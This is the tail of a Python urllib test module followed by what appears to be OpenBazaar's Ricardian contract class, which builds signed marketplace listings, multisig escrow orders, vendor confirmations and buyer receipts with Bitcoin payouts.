data = urllib.request.urlopen("http://localhost:%s" % handler.port)
for line in data:
self.assertEqual(line, expected_response)
def test_line_iteration(self):
lines = [b"We\n", b"got\n", b"here\n", b"verylong " * 8192 + b"\n"]
expected_response = b"".join(lines)
handler = self.start_server([(200, [], expected_response)])
data = urllib.request.urlopen("http://localhost:%s" % handler.port)
for index, line in enumerate(data):
self.assertEqual(line, lines[index],
"Fetched line number %s doesn't match expected:\n"
" Expected length was %s, got %s" %
(index, len(lines[index]), len(line)))
self.assertEqual(index + 1, len(lines))
threads_key = None
def setUpModule():
# Store the threading_setup in a key and ensure that it is cleaned up
# in the tearDown
global threads_key
threads_key = support.threading_setup()
def tearDownModule():
if threads_key:
support.threading_cleanup(*threads_key)
if __name__ == "__main__":
unittest.main()
| |
__author__ = 'chris'
import base64
import bitcointools
import json
import nacl.encoding
import nacl.signing
import os
import random
import re
import time
from binascii import unhexlify
from bitcoin import SelectParams
from bitcoin.core.script import CScript, OP_2, OP_3, OP_CHECKMULTISIG
from bitcoin.wallet import P2SHBitcoinAddress, P2PKHBitcoinAddress, CBitcoinAddress
from collections import OrderedDict
from config import DATA_FOLDER, TRANSACTION_FEE
from copy import deepcopy
from datetime import datetime
from dht.utils import digest
from hashlib import sha256
from keys.bip32utils import derive_childkey
from keys.keychain import KeyChain
from log import Logger
from market.profile import Profile
from market.btcprice import BtcPrice
from market.transactions import BitcoinTransaction
from protos.countries import CountryCode
from protos.objects import Listings
from market.smtpnotification import SMTPNotification
class Contract(object):
"""
A class for creating and interacting with OpenBazaar Ricardian contracts.
"""
def __init__(self, database, contract=None, hash_value=None, testnet=False):
"""
This class can be instantiated with either an `OrderedDict` or a hash
of a contract. If a hash is used, we will load the contract from either
the file system or cache.
Alternatively, pass in no parameters if the intent is to create a new
contract.
Args:
contract: an `OrderedDict` containing a filled out json contract
hash_value: a hash160 of a contract
testnet: is this contract on the testnet
"""
self.db = database
self.keychain = KeyChain(self.db)
if contract is not None:
self.contract = contract
elif hash_value is not None:
try:
file_path = self.db.filemap.get_file(hash_value.encode("hex"))
if file_path is None:
file_path = os.path.join(DATA_FOLDER, "cache", hash_value.encode("hex"))
with open(file_path, 'r') as filename:
self.contract = json.load(filename, object_pairs_hook=OrderedDict)
except Exception:
file_name = hash_value.encode("hex") + ".json"
if os.path.exists(os.path.join(DATA_FOLDER, "purchases", "unfunded", file_name)):
file_path = os.path.join(DATA_FOLDER, "purchases", "unfunded", file_name)
elif os.path.exists(os.path.join(DATA_FOLDER, "purchases", "in progress", file_name)):
file_path = os.path.join(DATA_FOLDER, "purchases", "in progress", file_name)
elif os.path.exists(os.path.join(DATA_FOLDER, "purchases", "trade receipts", file_name)):
file_path = os.path.join(DATA_FOLDER, "purchases", "trade receipts", file_name)
elif os.path.exists(os.path.join(DATA_FOLDER, "store", "contracts", "unfunded", file_name)):
file_path = os.path.join(DATA_FOLDER, "store", "contracts", "unfunded", file_name)
elif os.path.exists(os.path.join(DATA_FOLDER, "store", "contracts", "in progress", file_name)):
file_path = os.path.join(DATA_FOLDER, "store", "contracts", "in progress", file_name)
elif os.path.exists(os.path.join(DATA_FOLDER, "store", "contracts", "trade receipts", file_name)):
file_path = os.path.join(DATA_FOLDER, "store", "contracts", "trade receipts", file_name)
try:
with open(file_path, 'r') as filename:
self.contract = json.load(filename, object_pairs_hook=OrderedDict)
except Exception:
self.contract = {}
else:
self.contract = {}
self.log = Logger(system=self)
# used when purchasing this contract
self.testnet = testnet
self.notification_listener = None
self.blockchain = None
self.amount_funded = 0
self.received_txs = []
self.is_purchase = False
self.outpoints = []
def create(self,
expiration_date,
metadata_category,
title,
description,
currency_code,
price,
process_time,
nsfw,
shipping_origin=None,
shipping_regions=None,
est_delivery_domestic=None,
est_delivery_international=None,
terms_conditions=None,
returns=None,
keywords=None,
category=None,
condition=None,
sku=None,
images=None,
free_shipping=None,
shipping_currency_code=None,
shipping_domestic=None,
shipping_international=None,
options=None,
moderators=None,
contract_id=None):
"""
All parameters are strings except:
:param expiration_date: `string` (must be formatted UTC datetime)
:param keywords: `list`
:param nsfw: `boolean`
:param images: a `list` of image files
:param free_shipping: `boolean`
:param shipping_origin: a 'string' formatted `CountryCode`
:param shipping_regions: a 'list' of 'string' formatted `CountryCode`s
:param options: a 'dict' containing options as keys and 'list' as option values.
:param moderators: a 'list' of 'string' guids (hex encoded).
"""
profile = Profile(self.db).get()
if contract_id is not None and contract_id != "":
self.previous_title = self.contract["vendor_offer"]["listing"]["item"]["title"]
else:
self.previous_title = None
contract_id = digest(random.getrandbits(255)).encode("hex")
self.contract = OrderedDict(
{
"vendor_offer": {
"listing": {
"contract_id": contract_id,
"metadata": {
"version": "1",
"category": metadata_category.lower(),
"category_sub": "fixed price",
"last_modified": int(time.time())
},
"id": {
"guid": self.keychain.guid.encode("hex"),
"pubkeys": {
"guid": self.keychain.verify_key.encode(encoder=nacl.encoding.HexEncoder),
"bitcoin": bitcointools.bip32_extract_key(self.keychain.bitcoin_master_pubkey)
}
},
"item": {
"title": title,
"description": description,
"process_time": process_time,
"price_per_unit": {},
"nsfw": nsfw
}
}
}
}
)
if expiration_date == "":
self.contract["vendor_offer"]["listing"]["metadata"]["expiry"] = "never"
else:
self.contract["vendor_offer"]["listing"]["metadata"]["expiry"] = expiration_date + " UTC"
if metadata_category == "physical good" and condition is not None:
self.contract["vendor_offer"]["listing"]["item"]["condition"] = condition
if currency_code.upper() == "BTC":
item = self.contract["vendor_offer"]["listing"]["item"]
item["price_per_unit"]["bitcoin"] = round(float(price), 8)
else:
item = self.contract["vendor_offer"]["listing"]["item"]
item["price_per_unit"]["fiat"] = {}
item["price_per_unit"]["fiat"]["price"] = price
item["price_per_unit"]["fiat"]["currency_code"] = currency_code
if keywords is not None:
self.contract["vendor_offer"]["listing"]["item"]["keywords"] = []
self.contract["vendor_offer"]["listing"]["item"]["keywords"].extend(keywords)
if category is not None:
self.contract["vendor_offer"]["listing"]["item"]["category"] = category
if sku is not None:
self.contract["vendor_offer"]["listing"]["item"]["sku"] = sku
if options is not None:
self.contract["vendor_offer"]["listing"]["item"]["options"] = options
if metadata_category == "physical good":
self.contract["vendor_offer"]["listing"]["shipping"] = {}
shipping = self.contract["vendor_offer"]["listing"]["shipping"]
shipping["shipping_origin"] = shipping_origin
if free_shipping is False:
self.contract["vendor_offer"]["listing"]["shipping"]["free"] = False
self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"] = {}
if shipping_currency_code == "BTC":
self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]["bitcoin"] = {}
self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]["bitcoin"][
"domestic"] = shipping_domestic
self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]["bitcoin"][
"international"] = shipping_international
else:
shipping = self.contract["vendor_offer"]["listing"]["shipping"]
shipping["flat_fee"]["fiat"] = {}
shipping["flat_fee"]["fiat"]["price"] = {}
shipping["flat_fee"]["fiat"]["price"][
"domestic"] = shipping_domestic
shipping["flat_fee"]["fiat"]["price"][
"international"] = shipping_international
shipping["flat_fee"]["fiat"][
"currency_code"] = shipping_currency_code
else:
self.contract["vendor_offer"]["listing"]["shipping"]["free"] = True
self.contract["vendor_offer"]["listing"]["shipping"]["shipping_regions"] = []
for region in shipping_regions:
shipping = self.contract["vendor_offer"]["listing"]["shipping"]
shipping["shipping_regions"].append(region)
listing = self.contract["vendor_offer"]["listing"]
listing["shipping"]["est_delivery"] = {}
listing["shipping"]["est_delivery"]["domestic"] = est_delivery_domestic
listing["shipping"]["est_delivery"][
"international"] = est_delivery_international
if profile.handle != "":
self.contract["vendor_offer"]["listing"]["id"]["blockchain_id"] = profile.handle
if images is not None:
self.contract["vendor_offer"]["listing"]["item"]["image_hashes"] = []
for image_hash in images:
if len(image_hash) != 40:
raise Exception("Invalid image hash")
self.contract["vendor_offer"]["listing"]["item"]["image_hashes"].append(image_hash)
if terms_conditions is not None or returns is not None:
self.contract["vendor_offer"]["listing"]["policy"] = {}
if terms_conditions is not None:
self.contract["vendor_offer"]["listing"]["policy"]["terms_conditions"] = terms_conditions
if returns is not None:
self.contract["vendor_offer"]["listing"]["policy"]["returns"] = returns
if moderators is not None:
self.contract["vendor_offer"]["listing"]["moderators"] = []
for mod in moderators:
mod_info = self.db.moderators.get_moderator(mod)
if mod_info is not None:
moderator = {
"guid": mod,
"name": mod_info[5],
"avatar": mod_info[7].encode("hex"),
"short_description": mod_info[6],
"fee": str(mod_info[8]) + "%",
"blockchain_id": mod_info[4],
"pubkeys": {
"guid": mod_info[1].encode("hex"),
"bitcoin": {
"key": mod_info[2].encode("hex"),
"signature": base64.b64encode(mod_info[3])
}
}
}
self.contract["vendor_offer"]["listing"]["moderators"].append(moderator)
listing = json.dumps(self.contract["vendor_offer"]["listing"], indent=4)
self.contract["vendor_offer"]["signatures"] = {}
self.contract["vendor_offer"]["signatures"]["guid"] = \
base64.b64encode(self.keychain.signing_key.sign(listing)[:64])
self.contract["vendor_offer"]["signatures"]["bitcoin"] = \
bitcointools.encode_sig(*bitcointools.ecdsa_raw_sign(
listing, bitcointools.bip32_extract_key(self.keychain.bitcoin_master_privkey)))
self.save()
def add_purchase_info(self,
quantity,
refund_address,
ship_to=None,
shipping_address=None,
city=None,
state=None,
postal_code=None,
country=None,
moderator=None,
options=None):
"""
Update the contract with the buyer's purchase information.
"""
if not self.testnet and not (refund_address[:1] == "1" or refund_address[:1] == "3"):
raise Exception("Bitcoin address is not a mainnet address")
elif self.testnet and not \
(refund_address[:1] == "n" or refund_address[:1] == "m" or refund_address[:1] == "2"):
raise Exception("Bitcoin address is not a testnet address")
try:
bitcointools.b58check_to_hex(refund_address)
except AssertionError:
raise Exception("Invalid Bitcoin address")
profile = Profile(self.db).get()
order_json = {
"buyer_order": {
"order": {
"ref_hash": digest(json.dumps(self.contract, indent=4)).encode("hex"),
"date": str(datetime.utcnow()) + " UTC",
"quantity": quantity,
"id": {
"guid": self.keychain.guid.encode("hex"),
"pubkeys": {
"guid": self.keychain.verify_key.encode(encoder=nacl.encoding.HexEncoder),
"bitcoin": bitcointools.bip32_extract_key(self.keychain.bitcoin_master_pubkey),
}
},
"payment": {},
"refund_address": refund_address
}
}
}
SelectParams("testnet" if self.testnet else "mainnet")
if profile.handle != "":
order_json["buyer_order"]["order"]["id"]["blockchain_id"] = profile.handle
if self.contract["vendor_offer"]["listing"]["metadata"]["category"] == "physical good":
order_json["buyer_order"]["order"]["shipping"] = {}
order_json["buyer_order"]["order"]["shipping"]["ship_to"] = ship_to
order_json["buyer_order"]["order"]["shipping"]["address"] = shipping_address
order_json["buyer_order"]["order"]["shipping"]["city"] = city
order_json["buyer_order"]["order"]["shipping"]["state"] = state
order_json["buyer_order"]["order"]["shipping"]["postal_code"] = postal_code
order_json["buyer_order"]["order"]["shipping"]["country"] = country
if options is not None:
order_json["buyer_order"]["order"]["options"] = options
if moderator:
chaincode = sha256(str(random.getrandbits(256))).digest().encode("hex")
order_json["buyer_order"]["order"]["payment"]["chaincode"] = chaincode
valid_mod = False
for mod in self.contract["vendor_offer"]["listing"]["moderators"]:
if mod["guid"] == moderator:
order_json["buyer_order"]["order"]["moderator"] = moderator
masterkey_m = mod["pubkeys"]["bitcoin"]["key"]
valid_mod = True
if not valid_mod:
return False
masterkey_b = bitcointools.bip32_extract_key(self.keychain.bitcoin_master_pubkey)
masterkey_v = self.contract["vendor_offer"]["listing"]["id"]["pubkeys"]["bitcoin"]
buyer_key = unhexlify(derive_childkey(masterkey_b, chaincode))
vendor_key = unhexlify(derive_childkey(masterkey_v, chaincode))
moderator_key = unhexlify(derive_childkey(masterkey_m, chaincode))
redeem_script = CScript([OP_2, buyer_key, vendor_key, moderator_key, OP_3, OP_CHECKMULTISIG])
order_json["buyer_order"]["order"]["payment"]["redeem_script"] = redeem_script.encode("hex")
payment_address = str(P2SHBitcoinAddress.from_redeemScript(redeem_script))
order_json["buyer_order"]["order"]["payment"]["address"] = payment_address
order_json["buyer_order"]["order"]["payment"]["refund_tx_fee"] = TRANSACTION_FEE
else:
chaincode = sha256(str(random.getrandbits(256))).digest().encode("hex")
order_json["buyer_order"]["order"]["payment"]["chaincode"] = chaincode
masterkey_v = self.contract["vendor_offer"]["listing"]["id"]["pubkeys"]["bitcoin"]
vendor_key = unhexlify(derive_childkey(masterkey_v, chaincode))
payment_address = str(P2PKHBitcoinAddress.from_pubkey(vendor_key))
order_json["buyer_order"]["order"]["payment"]["address"] = payment_address
price_json = self.contract["vendor_offer"]["listing"]["item"]["price_per_unit"]
if "bitcoin" in price_json:
amount_to_pay = float(price_json["bitcoin"]) * quantity
else:
currency_code = price_json["fiat"]["currency_code"]
fiat_price = price_json["fiat"]["price"]
conversion_rate = BtcPrice.instance().get(currency_code.upper())
amount_to_pay = float("{0:.8f}".format(float(fiat_price) / float(conversion_rate))) * quantity
if "shipping" in self.contract["vendor_offer"]["listing"]:
if not self.contract["vendor_offer"]["listing"]["shipping"]["free"]:
shipping_origin = str(self.contract["vendor_offer"]["listing"]["shipping"][
"shipping_origin"].upper())
if shipping_origin == country.upper():
if "bitcoin" in self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]:
shipping_amount = float(self.contract["vendor_offer"]["listing"][
"shipping"]["flat_fee"]["bitcoin"]["domestic"]) * quantity
else:
price = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]["fiat"][
"price"]["domestic"]
currency = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"][
"fiat"]["currency_code"]
conversion_rate = BtcPrice.instance().get(currency.upper(), False)
shipping_amount = float("{0:.8f}".format(float(price) / float(conversion_rate))) * quantity
else:
if "bitcoin" in self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]:
shipping_amount = float(self.contract["vendor_offer"]["listing"]["shipping"][
"flat_fee"]["bitcoin"]["international"]) * quantity
else:
price = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]["fiat"][
"price"]["international"]
currency = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"][
"fiat"]["currency_code"]
conversion_rate = BtcPrice.instance().get(currency.upper(), False)
shipping_amount = float("{0:.8f}".format(float(price) / float(conversion_rate))) * quantity
amount_to_pay += shipping_amount
if round(amount_to_pay, 8) < round(TRANSACTION_FEE / float(100000000), 8):
raise Exception("Contract price is below transaction fee.")
order_json["buyer_order"]["order"]["payment"]["amount"] = round(amount_to_pay, 8)
self.contract["buyer_order"] = order_json["buyer_order"]
order = json.dumps(self.contract["buyer_order"]["order"], indent=4)
self.contract["buyer_order"]["signatures"] = {}
self.contract["buyer_order"]["signatures"]["guid"] = \
base64.b64encode(self.keychain.signing_key.sign(order)[:64])
self.contract["buyer_order"]["signatures"]["bitcoin"] = \
bitcointools.encode_sig(*bitcointools.ecdsa_raw_sign(
order, bitcointools.bip32_extract_key(self.keychain.bitcoin_master_privkey)))
return (self.contract["buyer_order"]["order"]["payment"]["address"],
order_json["buyer_order"]["order"]["payment"]["amount"])
def add_order_confirmation(self,
libbitcoin_client,
payout_address,
comments=None,
shipper=None,
tracking_number=None,
est_delivery=None,
url=None,
password=None):
"""
Add the vendor's order confirmation to the contract.
"""
self.blockchain = libbitcoin_client
if not self.testnet and not (payout_address[:1] == "1" or payout_address[:1] == "3"):
raise Exception("Bitcoin address is not a mainnet address")
elif self.testnet and not \
(payout_address[:1] == "n" or payout_address[:1] == "m" or payout_address[:1] == "2"):
raise Exception("Bitcoin address is not a testnet address")
try:
bitcointools.b58check_to_hex(payout_address)
except AssertionError:
raise Exception("Invalid Bitcoin address")
conf_json = {
"vendor_order_confirmation": {
"invoice": {
"ref_hash": digest(json.dumps(self.contract, indent=4)).encode("hex")
}
}
}
if self.contract["vendor_offer"]["listing"]["metadata"]["category"] == "physical good":
shipping = {"shipper": shipper, "tracking_number": tracking_number, "est_delivery": est_delivery}
conf_json["vendor_order_confirmation"]["invoice"]["shipping"] = shipping
elif self.contract["vendor_offer"]["listing"]["metadata"]["category"] == "digital good":
content_source = {"url": url, "password": password}
conf_json["vendor_order_confirmation"]["invoice"]["content_source"] = content_source
if comments:
conf_json["vendor_order_confirmation"]["invoice"]["comments"] = comments
order_id = digest(json.dumps(self.contract, indent=4)).encode("hex")
# apply signatures
outpoints = json.loads(self.db.sales.get_outpoint(order_id))
if "moderator" in self.contract["buyer_order"]["order"]:
redeem_script = self.contract["buyer_order"]["order"]["payment"]["redeem_script"]
tx = BitcoinTransaction.make_unsigned(outpoints, payout_address, testnet=self.testnet)
chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
masterkey_v = bitcointools.bip32_extract_key(self.keychain.bitcoin_master_privkey)
vendor_priv = derive_childkey(masterkey_v, chaincode, bitcointools.MAINNET_PRIVATE)
sigs = tx.create_signature(vendor_priv, redeem_script)
conf_json["vendor_order_confirmation"]["invoice"]["payout"] = {}
conf_json["vendor_order_confirmation"]["invoice"]["payout"]["address"] = payout_address
conf_json["vendor_order_confirmation"]["invoice"]["payout"]["value"] = tx.get_out_value()
conf_json["vendor_order_confirmation"]["invoice"]["payout"]["signature(s)"] = sigs
else:
tx = BitcoinTransaction.make_unsigned(outpoints, payout_address, testnet=self.testnet)
chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
masterkey_v = bitcointools.bip32_extract_key(self.keychain.bitcoin_master_privkey)
vendor_priv = derive_childkey(masterkey_v, chaincode, bitcointools.MAINNET_PRIVATE)
tx.sign(vendor_priv)
tx.broadcast(self.blockchain)
self.db.transactions.add_transaction(tx.to_raw_tx())
self.log.info("broadcasting payout tx %s to network" % tx.get_hash())
self.db.sales.update_payment_tx(order_id, tx.get_hash())
confirmation = json.dumps(conf_json["vendor_order_confirmation"]["invoice"], indent=4)
conf_json["vendor_order_confirmation"]["signature"] = \
base64.b64encode(self.keychain.signing_key.sign(confirmation)[:64])
self.contract["vendor_order_confirmation"] = conf_json["vendor_order_confirmation"]
self.db.sales.update_status(order_id, 2)
file_path = os.path.join(DATA_FOLDER, "store", "contracts", "in progress", order_id + ".json")
with open(file_path, 'w') as outfile:
outfile.write(json.dumps(self.contract, indent=4))
def accept_order_confirmation(self, notification_listener, confirmation_json=None):
"""
Validate the order confirmation sent over from the vendor and update our node accordingly.
"""
self.notification_listener = notification_listener
try:
if confirmation_json:
self.contract["vendor_order_confirmation"] = json.loads(confirmation_json,
object_pairs_hook=OrderedDict)
contract_dict = json.loads(json.dumps(self.contract, indent=4), object_pairs_hook=OrderedDict)
del contract_dict["vendor_order_confirmation"]
contract_hash = digest(json.dumps(contract_dict, indent=4)).encode("hex")
ref_hash = self.contract["vendor_order_confirmation"]["invoice"]["ref_hash"]
if ref_hash != contract_hash:
raise Exception("Order number doesn't match")
if self.contract["vendor_offer"]["listing"]["metadata"]["category"] == "physical good":
shipping = self.contract["vendor_order_confirmation"]["invoice"]["shipping"]
if "tracking_number" not in shipping or "shipper" not in shipping:
raise Exception("No shipping information")
# TODO: verify signature
# TODO: verify payout object
status = self.db.purchases.get_status(contract_hash)
if status == 2 or status == 3:
raise Exception("Order confirmation already processed for this contract")
# update the order status in the db
self.db.purchases.update_status(contract_hash, 2)
self.db.purchases.status_changed(contract_hash, 1)
file_path = os.path.join(DATA_FOLDER, "purchases", "in progress", contract_hash + ".json")
# update the contract in the file system
with open(file_path, 'w') as outfile:
outfile.write(json.dumps(self.contract, indent=4))
title = self.contract["vendor_offer"]["listing"]["item"]["title"]
if "image_hashes" in self.contract["vendor_offer"]["listing"]["item"]:
image_hash = unhexlify(self.contract["vendor_offer"]["listing"]["item"]["image_hashes"][0])
else:
image_hash = ""
if "blockchain_id" in self.contract["vendor_offer"]["listing"]["id"]:
handle = self.contract["vendor_offer"]["listing"]["id"]["blockchain_id"]
else:
handle = ""
vendor_guid = self.contract["vendor_offer"]["listing"]["id"]["guid"]
self.notification_listener.notify(vendor_guid, handle, "order confirmation", contract_hash, title,
image_hash)
# Send SMTP notification
notification = SMTPNotification(self.db)
notification.send("[OpenBazaar] Order Confirmed and Shipped",
"You have received an order confirmation.<br><br>"
"Order: %s<br>Vendor: %s<br>Title: %s<br>" % (contract_hash, vendor_guid, title))
return True
except Exception, e:
return e.message
def add_receipt(self,
received,
libbitcoin_client,
feedback=None,
quality=None,
description=None,
delivery_time=None,
customer_service=None,
review="",
dispute=False,
claim=None,
anonymous=True):
"""
Add the final piece of the contract that appends the review and payout transaction.
"""
self.blockchain = libbitcoin_client
contract_dict = json.loads(json.dumps(self.contract, indent=4), object_pairs_hook=OrderedDict)
if "dispute" in contract_dict:
del contract_dict["dispute"]
if "dispute_resolution" in contract_dict:
del contract_dict["dispute_resolution"]
reference_hash = digest(json.dumps(contract_dict, indent=4)).encode("hex")
receipt_json = {
"buyer_receipt": {
"receipt": {
"ref_hash": reference_hash,
"listing": {
"received": received,
"listing_hash": self.contract["buyer_order"]["order"]["ref_hash"]
},
"dispute": {
"dispute": dispute
}
}
}
}
if "vendor_order_confirmation" in self.contract:
order_id = self.contract["vendor_order_confirmation"]["invoice"]["ref_hash"]
else:
order_id = self.get_order_id()
if None not in (feedback, quality, description, delivery_time, customer_service):
address = self.contract["buyer_order"]["order"]["payment"]["address"]
chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
masterkey_b = self.contract["buyer_order"]["order"]["id"]["pubkeys"]["bitcoin"]
buyer_pub = derive_childkey(masterkey_b, chaincode)
buyer_priv = derive_childkey(bitcointools.bip32_extract_key(self.keychain.bitcoin_master_privkey),
chaincode, bitcointools.MAINNET_PRIVATE)
amount = self.contract["buyer_order"]["order"]["payment"]["amount"]
listing_hash = self.contract["vendor_offer"]["listing"]["contract_id"]
receipt_json["buyer_receipt"]["receipt"]["rating"] = OrderedDict()
receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"] = OrderedDict()
receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["feedback"] = feedback
receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["quality"] = quality
receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["description"] = description
receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["delivery_time"] = delivery_time
receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["customer_service"] = customer_service
receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["review"] = review
receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["address"] = address
receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["buyer_key"] = buyer_pub
receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["amount"] = amount
receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["listing"] = listing_hash
receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["proof_of_tx"] = \
base64.b64encode(self.db.purchases.get_proof_sig(order_id))
if not anonymous:
receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["buyer_guid"] = \
self.keychain.guid.encode("hex")
receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["buyer_guid_key"] = \
self.keychain.verify_key.encode(encoder=nacl.encoding.HexEncoder)
status = self.db.purchases.get_status(order_id)
if status < 3 and "moderator" in self.contract["buyer_order"]["order"]:
outpoints = json.loads(self.db.purchases.get_outpoint(order_id))
payout_address = self.contract["vendor_order_confirmation"]["invoice"]["payout"]["address"]
redeem_script = str(self.contract["buyer_order"]["order"]["payment"]["redeem_script"])
value = self.contract["vendor_order_confirmation"]["invoice"]["payout"]["value"]
tx = BitcoinTransaction.make_unsigned(outpoints, payout_address,
testnet=self.testnet, out_value=value)
chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
masterkey_b = bitcointools.bip32_extract_key(self.keychain.bitcoin_master_privkey)
buyer_priv = derive_childkey(masterkey_b, chaincode, bitcointools.MAINNET_PRIVATE)
buyer_signatures = tx.create_signature(buyer_priv, redeem_script)
signatures = []
for i in range(len(outpoints)):
for vendor_sig in self.contract["vendor_order_confirmation"]["invoice"]["payout"]["signature(s)"]:
if vendor_sig["index"] == i:
v_signature = vendor_sig["signature"]
for buyer_sig in buyer_signatures:
if buyer_sig["index"] == i:
b_signature = buyer_sig["signature"]
signature_obj = {"index": i, "signatures": [b_signature, v_signature]}
signatures.append(signature_obj)
receipt_json["buyer_receipt"]["receipt"]["payout"] = {}
tx.multisign(signatures, redeem_script)
tx.broadcast(self.blockchain)
self.db.transactions.add_transaction(tx.to_raw_tx())
self.log.info("broadcasting payout tx %s to network" % tx.get_hash())
receipt_json["buyer_receipt"]["receipt"]["payout"]["txid"] = tx.get_hash()
receipt_json["buyer_receipt"]["receipt"]["payout"]["signature(s)"] = buyer_signatures
receipt_json["buyer_receipt"]["receipt"]["payout"]["value"] = tx.get_out_value()
if claim:
receipt_json["buyer_receipt"]["receipt"]["dispute"]["claim"] = claim
receipt = json.dumps(receipt_json["buyer_receipt"]["receipt"], indent=4)
receipt_json["buyer_receipt"]["signature"] = \
base64.b64encode(self.keychain.signing_key.sign(receipt)[:64])
self.contract["buyer_receipt"] = receipt_json["buyer_receipt"]
if "rating" in self.contract["buyer_receipt"]["receipt"]:
self.contract["buyer_receipt"]["receipt"]["rating"]["signature"] = \
bitcointools.encode_sig(*bitcointools.ecdsa_raw_sign(json.dumps(
self.contract["buyer_receipt"]["receipt"]["rating"]["tx_summary"], indent=4), buyer_priv))
if not anonymous:
self.contract["buyer_receipt"]["receipt"]["rating"]["guid_signature"] = \
base64.b64encode(self.keychain.signing_key.sign(json.dumps(
self.contract["buyer_receipt"]["receipt"]["rating"]["tx_summary"], indent=4))[:64])
if status < 3:
self.db.purchases.update_status(order_id, 3)
file_path = os.path.join(DATA_FOLDER, "purchases", "trade receipts", order_id + ".json")
with open(file_path, 'w') as outfile:
outfile.write(json.dumps(self.contract, indent=4))
file_path = os.path.join(DATA_FOLDER, "purchases", "in progress", order_id + ".json")
if os.path.exists(file_path):
os.remove(file_path)
else:
file_path = os.path.join(DATA_FOLDER, "purchases", "trade receipts", order_id + ".json")
with open(file_path, 'wb') as outfile:
outfile.write(json.dumps(self.contract, indent=4))
def accept_receipt(self, notification_listener, blockchain, receipt_json=None):
"""
Process the final receipt sent over by the buyer. If valid, broadcast the transaction
to the bitcoin network.
"""
self.notification_listener = notification_listener
self.blockchain = blockchain
if "buyer_receipt" in self.contract:
raise Exception("A receipt has already been processed for this order")
if receipt_json:
self.contract["buyer_receipt"] = json.loads(receipt_json,
object_pairs_hook=OrderedDict)
contract_dict = json.loads(json.dumps(self.contract, indent=4), object_pairs_hook=OrderedDict)
del contract_dict["buyer_receipt"]
if "dispute" in contract_dict:
del contract_dict["dispute"]
if "dispute_resolution" in contract_dict:
del contract_dict["dispute_resolution"]
contract_hash = digest(json.dumps(contract_dict, indent=4)).encode("hex")
ref_hash = self.contract["buyer_receipt"]["receipt"]["ref_hash"]
if ref_hash != contract_hash:
raise Exception("Order number doesn't match")
# TODO: verify buyer signature
if "vendor_order_confirmation" in self.contract:
order_id = self.contract["vendor_order_confirmation"]["invoice"]["ref_hash"]
else:
order_id = self.get_order_id()
status = self.db.sales.get_status(order_id)
if status not in (2, 5, 6):
raise Exception("Can only process a receipt after an order confirmation "
"is sent or a dispute is finalized")
title = self.contract["vendor_offer"]["listing"]["item"]["title"]
if "image_hashes" in self.contract["vendor_offer"]["listing"]["item"]:
image_hash = unhexlify(self.contract["vendor_offer"]["listing"]["item"]["image_hashes"][0])
else:
image_hash = ""
buyer_guid = unhexlify(self.contract["buyer_order"]["order"]["id"]["guid"])
if "blockchain_id" in self.contract["buyer_order"]["order"]["id"]:
handle = self.contract["buyer_order"]["order"]["id"]["blockchain_id"]
else:
handle = ""
if "moderator" in self.contract["buyer_order"]["order"] and status not in (5, 6):
outpoints = json.loads(self.db.sales.get_outpoint(order_id))
payout_address = str(self.contract["vendor_order_confirmation"]["invoice"]["payout"]["address"])
redeem_script = str(self.contract["buyer_order"]["order"]["payment"]["redeem_script"])
value = self.contract["vendor_order_confirmation"]["invoice"]["payout"]["value"]
tx = BitcoinTransaction.make_unsigned(outpoints, payout_address,
testnet=self.testnet, out_value=value)
vendor_sigs = self.contract["vendor_order_confirmation"]["invoice"]["payout"]["signature(s)"]
buyer_sigs = self.contract["buyer_receipt"]["receipt"]["payout"]["signature(s)"]
signatures = []
for i in range(len(outpoints)):
for vendor_sig in vendor_sigs:
if vendor_sig["index"] == i:
v_signature = vendor_sig["signature"]
for buyer_sig in buyer_sigs:
if buyer_sig["index"] == i:
b_signature = buyer_sig["signature"]
signature_obj = {"index": i, "signatures": [b_signature, v_signature]}
signatures.append(signature_obj)
tx.multisign(signatures, redeem_script)
tx.broadcast(self.blockchain)
self.db.transactions.add_transaction(tx.to_raw_tx())
self.log.info("broadcasting payout tx %s to network" % tx.get_hash())
self.db.sales.update_payment_tx(order_id, tx.get_hash())
self.notification_listener.notify(buyer_guid, handle, "rating received", order_id, title, image_hash)
notification_rater = handle if handle else buyer_guid.encode('hex')
notification = SMTPNotification(self.db)
notification.send("[OpenBazaar] New Rating Received",
"You received a new rating from %s for Order #%s - \"%s\". " % (notification_rater,
order_id,
title))
if "rating" in self.contract["buyer_receipt"]["receipt"]:
self.db.ratings.add_rating(self.contract["buyer_receipt"]["receipt"]
["rating"]["tx_summary"]["listing"],
json.dumps(self.contract["buyer_receipt"]["receipt"]["rating"], indent=4))
if status == 2:
self.db.sales.status_changed(order_id, 1)
self.db.sales.update_status(order_id, 3)
file_path = os.path.join(DATA_FOLDER, "store", "contracts", "trade receipts", order_id + ".json")
with open(file_path, 'w') as outfile:
outfile.write(json.dumps(self.contract, indent=4))
